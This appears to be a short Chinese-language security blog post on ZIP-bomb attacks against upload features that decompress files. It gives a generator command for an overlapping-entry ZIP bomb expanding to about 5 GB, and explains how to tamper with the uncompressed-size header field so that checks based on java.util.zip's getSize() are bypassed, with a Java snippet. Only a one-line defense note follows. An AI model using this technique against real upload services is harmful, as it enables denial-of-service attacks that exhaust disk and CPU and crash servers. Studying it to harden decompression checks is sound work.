最近看到资料有说到ZIP炸弹,主要在存在上传功能且对上传文件有解压动作的地方,如果校验不严,可能导致压缩炸弹,导致消耗CPU导致宕机
1、生成ZIP炸弹:
https://github.com/CreeperKong/zipbomb-generator
python3 zipbomb.py --mode=quoted_overlap --num-files=250 --compressed-size=21179 > zbsm.zip
–num-files :压缩包包含的文件数量
–compressed-size:文件压缩大小
可以看到生成了一个zbsm.zip的压缩包,其中包含250个约20M大小的子文件,全部解压出来即有5G的大小,如果可以重放,则瞬间可填满硬盘
使用脚本查看解压后的大小:
linux下还可以使用dd命令 以及bzip2命令
2、场景:
有些上传处使用了如:
Java.util.jar.jarfile
Java.util.zip.Zipfile
通过 java.util.zip.ZipEntry.getSize()获取解压后的大小,可使用010editor对zip文件进行编辑:
struct ZIPFILERECORD record 为文件名;
uint frUncompressedSize为解压后的文件大小;
此处我们对uint frUncompressedSize进行修改,可绕过对解压后实际大小的判断:
如,我们修改uint frUncompressedSize大小为111:
利用java.util.zip进行解压后文件大小判断:
(java代码渣,求勿喷)
import java.io.*;
import java.util.zip.ZipEntry;
import java.util.zip.*;
public class Main {
public static void main(String[] args) {
File mfile = new File("D:/05-MY-PROGRAM/m_java/zipboom/zbsm.zip");
try {
ZipFile zipFile = new ZipFile(mfile);
InputStream in=new BufferedInputStream(new FileInputStream(mfile));
ZipInputStream zin=new ZipInputStream(in);
ZipEntry ze;
ze=zin.getNextEntry();
System.out.println("ZIP'Size is :" + ze.getSize());
}catch (Exception e)
{
e.getStackTrace();
}
}
}
3、防御:
对上传zip文件进行文件个数、文件大小等进行判断
另参考:
https://www.bamsoftware.com/hacks/zipbomb/